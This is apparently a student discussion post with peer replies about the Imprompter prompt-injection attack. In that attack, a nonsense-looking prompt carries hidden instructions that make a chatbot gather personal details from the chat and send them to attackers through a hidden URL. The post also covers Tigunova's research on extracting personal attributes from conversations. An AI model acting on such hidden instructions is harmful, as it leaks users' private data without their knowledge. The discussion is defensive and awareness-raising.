In recent times, there has been a significant increase in large language modeling software, specifically generative AI, as a result, many users are able to incorporate these throughout their daily usage. However, researchers and hackers have been working to find weaknesses within these AI systems, one particular category being prompt injections (Burges, 2024). This recent discovery by researchers, which showcases an algorithm capable of a prompt, has become a very concerning issue, as the prompt is a malicious algorithm with hidden instructions that can send private user information to attackers (Burges, 2024). This attack focuses on interactions between users and the AI model they are utilizing, where the seemingly harmless prompts are disguised as nonsense to the users but have harmful instructions within them that allow the model to interpret them as commands to be completed. The danger of this weakness within AI systems is the vulnerabilities they present. By presenting attackers with the possibility to access personal user information such as names, addresses, and other identifying information, malicious actors can collect these details without the user ever realizing what has occurred.
The attack, Imprompeter, allows an English-language sentence directed to the LLM to search its history for user information that may have been entered in previous conversations. Once it has been located, the algorithm is prompted to send the information back to the hackers (Burges, 2024). The strength of Imprompter comes from the nuances of security risks associated with prompt injection attacks, and these attacks manipulate LLM’s input process by disguising hidden commands within randomized texts, which the model can read and act upon (Burges, 2024). Furthermore, this method goes beyond jailbreaking techniques, which discusses the ever-developing class of various exploiting methods that hinder AI software’s built-in safety features from becoming aware of malicious behavior. The most alarming issue with Imprompter is the attack ability not only be hidden when injecting the algorithm into the AI system but also when delivering data to the attacker through a hidden URL it is still maintaining transparency to the user as a regular LLM chat interface (Burges, 2024).
Another key indicator of this issue is research conducted by Anna Tigunova. In her paper Extracting Personal Information from Conversations, we can gather many details about the problems surrounding Hidden Attribute Models (HAMs) and Retrieval-based Hidden Attribute Models (RHAM). These aspects, discussed in 2020, indicate AI’s potential to extract private user information through standard chat conversational data (Tigunova, 2020). When understanding the capabilities of both these functionalities, it is essential to note the varying aspects of information they can gather. In one instance, HAM leverages key terms in conversations, allowing it to filter and focus on patient attributes(Tigunova, 2020). However, RHAM expands this ability by including external document collections, which helps retrieve additional information by accessing sources external to the LLM, creating a broader range of attributes to be predicted (Tigunova, 2020). The methods illustrated by Tigunova align with the concerns raised in the article This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats, both discuss the vulnerabilities created by prompt engineering within AI models.
Additionally, these attacks like Imprompter could exploit RHAM techniques to gather and leak user information. Although these vulnerabilities, which have been addressed, have come through research and not attackers, we must maintain research for these issues. By understanding holes in AI security before they are exploited, we can reduce large-scale user data leaks from occurring.
References
Burgess, M. (2024, October 17). This prompt can make an AI chatbot identify and extract personal details from your chats. WIRED. https://www.wired.com/story/ai-imprompter-malware-llm/
Tigunova, A. (2020, April). Extracting personal information from conversations. In Companion Proceedings of the Web Conference 2020 (pp. 284-288).
A very timely discussion post! Artificial intelligence is becoming powerful day by day. A smart hacking idea like this is very concerning. I think people should keep away from free AI generator sites. This type of free site can inject malicious codes into the system, which can be destructive in the future. We must act now to safeguard our personal information. Any suspicious activity in the system should be taken care of as soon as possible. Again, we should not share our personal information through public conversation or in a group.
Great post, AI is a huge issue right now in all fields I feel not just cybersecurity. Everyone is scared it’s going to take jobs which I don’t think will happen. I think this prompt injections are one of AI’s biggest security risks. Though really, its first why is the personal user information in the AI model in the first place. Most people don’t know or care that any information you put into an AI model gets saved and used to improve the model hence the data is being leaked leading to attacks like these to be possible. The best solution I feel is to tackle the issue from both sides, like you mentioned in the article that AI models’ security itself need to be bolstered so that when prompted the model doesn’t release the information. But I also think checks and security need to be put in place so that the information isn’t given to the AI in the first place something like a DLP for AI.
Tigunova’s research paper highlighted a significant AI vulnerability that can cause data exfiltration from a conversational dialogue. The research also how the model can extract personal information using three contextual sources such as person, attribute, and value identified in the dialogue. Interestingly, the paper eluded to future work, on how RHAM can integrated with external conversational AI sources as a “Conversational Partner” to clear out conversational noise and omit ambiguous context. For instance, the paper illustrated how to extract the person’s job by linking two different statements:
A: I take photos all day long
B: Isn’t it a nice thing to do for a living?
From A and B, although the context eludes that the speaker is a photographer, there is still ambiguity if it is a hobby or a job(2020)[1].
I can’t agree more with you. Even these emerging exploits stemmed from academic research, however, eavesdroppers will keep finding these vulnerabilities in AI. Great knowledge. Thank you for sharing.
[1] Tigunova,(April, 2020)Extracting personal information from conversations. ACM Digital Library. Retrieved from: https://dl.acm.org/doi/fullHtml/10.1145/3366424.3382089
With AI systems becoming more and more involved in our day to day lives, it is essential to enhance our defences against these attacks. Your examination of the weaknesses posed by prompt injection attacks, particularly the Imprompter method, highlights an increasingly important side of AI security that often goes overlooked. It’s striking how these hidden commands can exploit the very design of language models, leading to significant privacy risks.
This article helps to explain an urgent issue: the growing susceptibility of AI systems to trigger injection attacks. The ability for Imprompter to harvest private user data and leave it untouched is terrifying as more users interact with AI every day. This danger makes the security of AI systems questionable. I love that Anna Tigunova’s research was included because it shows the importance of continuous research to AI safety. We are struck by how research on HAM and RHAM called out privacy threats long before Imprompter.
This post really highlights a crucial issue as more people incorporate AI into their daily lives, often sharing personal information without fully understanding the risks. With the rise of generative AI, not everyone knows how to follow safety tips when interacting with these systems, making them vulnerable to attacks like Imprompter.
It’s concerning to think that seemingly innocent prompts can hide malicious instructions capable of exposing sensitive data. We need to prioritize educating users about these risks and promote awareness of how to interact safely with AI. By staying informed and proactive, we can help protect ourselves and others from potential data leaks and keep our information secure.
Great post, Harshad! With the increase of AI tools or applications usage in daily interactions with data over the internet and the nature of these AI tools. User awareness is more important than ever. First, users need to understand how any AI tool being used works, how it interacts with the input data in terms of privacy, and for how long input data will be cached locally. Also, details about the security measures being carried out by AI tools to block or control any unauthorized access should be communicated to users. A zero-trust mindset and minimizing the sharing of personal data can help users reduce their risk when using these AI tools.
Nice post Harshad! I’m surprised at how generative AI has improved so much in a short time and how they can recover personal information so easily. It even has the option to provide information such as names, addresses. This can identify you and give attackers more options for more accurate attacks and you might not even notice it! It is important to make standards for these tools to handle personal information and better options on how to handle them.
I think that the prompt attack is something that should be seriously considered, I don’t think LLM developers are considering how hackers can exploit this feature to gather information. It would be good to make extra efforts on these new vulnerabilities. Thanks for sharing the information!
Great post! The growth of AI technology is really fast and its usefulness as well as its vulnerability is also alarming because hackers are working day and night to learn on how to attack users like the imprompter attack, so more user awareness should be out there so users can know how to protect their data by having a zero trust mindset.